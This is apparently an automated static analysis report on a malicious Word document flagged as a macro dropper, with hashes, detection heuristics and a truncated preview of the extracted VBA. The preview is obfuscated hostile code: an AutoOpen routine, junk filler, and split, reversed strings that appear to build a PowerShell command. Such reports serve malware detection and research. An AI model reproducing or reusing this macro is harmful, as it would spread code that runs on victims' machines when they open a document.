Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 30031fb352b8c753…

MALICIOUS

Office (OLE)

Size: 143.0 KB
Created: 2018-05-15 21:56:00
Authoring application: Microsoft Office Word
First seen: 2019-04-18
MD5: 7158cd5e6e60d712bafe4b5c283a094a
SHA-1: 09b6b4857c6882beca3abc5fb08eb0478dfc660b
SHA-256: 30031fb352b8c753ca5aa8756a67435f19f94046fac589724d2a41fd162012b2
Risk Score: 202

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The Autoopen macro and Shell() call indicate an attempt to execute arbitrary code. The ClamAV detection name 'Doc.Dropper.Agent-6545420-0' suggests it functions as a dropper for other malware. No specific family could be identified from the provided evidence.

Heuristics (6)

  • ClamAV: Doc.Dropper.Agent-6545420-0 [critical] CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6545420-0
  • VBA macros detected [medium, 2 related findings] OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 110276 bytes
SHA-256: 41b537fc3993a72a442118be569cd6e42a138e1516f0a2ce345764c8c8358c50
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "QfiBpDYOoj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub wwqcI(zoEjiN)
VJQED = HTiBUi
ZXnEw = aXkIH
kMvZq = qGNMZj + Sgn(3169 - MwrNz - ulHZA + Fix(99793)) - 68921 - CDbl(35445)
klBJjS = 33649
End Sub
Sub tsRdb(NwHCo)
ijWKkd = EVYqAY
daXWU = vkzVfs
bubtz = THEOqY + Sgn(7443 - MpVBR - Gjmak + Fix(65321)) - 98461 - CDbl(8029)
jBisJX = 20508
itEENZ = jwQVi
bUOmMv = AJPwP
VNMju = BurIMA + Sgn(88016 - atlRd - zHhQF + Fix(95066)) - 52367 - CDbl(5603)
UiIpzD = 97040
RWYjA = LBmSoh
YwStO = jwbwV
AWiDKu = bZTuE + Sgn(78704 - XVOTim - owfqw + Fix(72110)) - 81454 - CDbl(34380)
qaDhz = 25046
End Sub
Sub zbYlFh(DNEPp)
iHRjd = awNOI
KBcUB = zKnQs
AQGrc = sWAGqi + Sgn(16199 - Enmjk - QZvjb + Fix(68598)) - 24038 - CDbl(94799)
fXRPL = 67082
FiVlW = MDKuLh
LYDff = bVaQsQ
FViYSw = rhDNzq + Sgn(57075 - rVhXf - EGUmkV + Fix(15101)) - 84504 - CDbl(58483)
dUbjr = 40505
End Sub
Sub Autoopen()
On Error Resume Next
bOvLdU = jpMNdF
UkABOO = ibdzDk
iOzVWi = Jjjam + Sgn(58581 - vJtOY - IkbicG + Fix(22)) - 86429 - CDbl(76045)
LajFC = 51087
DRhlWYCzIh (rGWdL + IwjIzQuJVs + Racjj)
SjkiBb = nStPiN
RXACZ = UtBHB
zjKEA = TFVia + Sgn(90838 - dHnwwr - QpitZZ + Fix(20454)) - 56368 - CDbl(34800)
hdcvi = 20215
End Sub
Sub NssPHA(wFTvvh)
CQOpHA = ibMpn
AzSmzz = jGwYJ
zzUFOh = biNOFX + Sgn(19050 - jRjZT - iwnhw + Fix(96356)) - 42931 - CDbl(26450)
RpjRAT = 18934
zIDVW = Dhbnzz
SwqlRw = YSjONi
ZYFJsZ = jRPiMO + Sgn(68927 - UKXOG - rqfjUc + Fix(93588)) - 59574 - CDbl(47059)
HnoiIW = 58631
Ztija = EkzYz
rzcvh = ZZYzzE
bbYaFs = jRoMQK + Sgn(31915 - ikiYhz - HLswZz + Fix(9659)) - 64413 - CDbl(55252)
inwbfJ = 84545
End Sub
Sub ztaLPf(RzuoS)
WtdUNh = SAbjL
lXRAw = mrhGXv
NaIzKs = THtUH + Sgn(35400 - jOwRqz - tzzwvO + Fix(60109)) - 67058 - CDbl(79768)
GYRUiJ = 1720
End Sub

Attribute VB_Name = "qBwddwtjw"
Sub diojv(UaIDOi)
lSGOjA = AEwBz
zPVCDP = bFGzZ
SzIBzC = VNLXi + Sgn(19275 - pDZknj - zFFFAz + Fix(28037)) - 7347 - CDbl(61244)
HoGiI = 85352
End Sub
Function IwjIzQuJVs()
On Error Resume Next
Awodm = zUtja
jWLtf = uCvzD
RhzQuD = hLVjos + Sgn(37967 - BHlGP - fzovva + Fix(27543)) - 27064 - CDbl(79929)
DvqLF = 7593
CifRQo = hdozj
McTsV = DdVqqC
lXiDV = jNnAtw + Sgn(80151 - NtrWDh - iaXCW + Fix(36321)) - 62563 - CDbl(34752)
soPGDw = 6298
szXrWjUpv = GInjl("aBTy'+'('+')XUame'+'tI-eXU'+'a+'+'XUakXUa'+'+Qlih0B", 19390 + 7 - 19390, 19390 + 43 - 19390)
SOwzZ = ZtjAqj
TnUpGw = AzQDv
IFijY = qSDol + Sgn(46091 - wzJqS - iCYBvR + Fix(93281)) - 3159 - CDbl(93778)
TwtBS = 37472
aShJF = YpKhX
MZPpAq = cuUFf
InzsiQ = IQzLT + Sgn(9612 - GHShMr - TTwSz + Fix(63264)) - 80437 - CDbl(97287)
FNBZz = 46926
EsrssYZ = GInjl("%S+'Jtln'+'W'+'TJtoDyse.'+'UYYGTy{yrt{)'+'XC'+'DAGTy '+'ni'+' cfsaGT'+'y'+'(h'+'ca'+'e'+'rof;'+')'+'XU'+'aeXUa+X'+'UMHk%", 39851 + 5 - 39851, 39851 + 114 - 39851)
zbRXmv = DWvzRU
nsoMpU = ZljKKL
wRfvhj = FvUlY + Sgn(83063 - wCjXdd - UNNID + Fix(55737)) - 45018 - CDbl(81029)
MckjEE = 30276
jwDdD = hiMlz
tpThE = SphUO
NKKNa = sTUnR + Sgn(34089 - HEJAd - rYzrH + Fix(99260)) - 33907 - CDbl(72949)
YQiMiw = 31246
Awzmdq = GInjl("cBa'+'xe.XUa( + BS'+'NG'+'Ty'+' + X'+'UaK4TXUa'+'RwT3", 3383 + 5 - 3383, 3383 + 47 - 3383)
zUIHsi = FYBizK
oDOWj = SDNIT
vEJEjF = KLjVzz + Sgn(87393 - lizno - PcazLR + Fix(99932)) - 51615 - CDbl(88554)
zovjq = 91117
bjJFps = rzTFwi
lcSUm = iXUAjD
FXMIq = TkJcK + Sgn(50642 - vWJAXG - CwifG + Fix(50538)) - 37503 - CDbl(27518)
PIVmY = 59856
ZzLbDi = GInjl("ZMSi[eMohsp$ (. | )43]RaHc[,'yse' eCALPerC-29]Ra9V", 37488 + 3 - 37488, 37488 + 44 - 37488)
nLPoL = bzHuA
HNTddr = HsjBQ
EfuUon = QCVoI + Sgn(33129 - jWiXM - bGqvis + Fix(90913)) - 14671 - CDbl(45696)
GKwAGn = 64772
jOojGP = HBclv
KhsIS = WOzlG
qwroGc = JBIIZ + Sgn(97738 - OKtKTM - qDXqts + Fix(50504)) - 37566 - CDbl(36976)
chuPQa = 37853
TmfDR = GInjl("WaVX'+'Uaov'+'
... (truncated)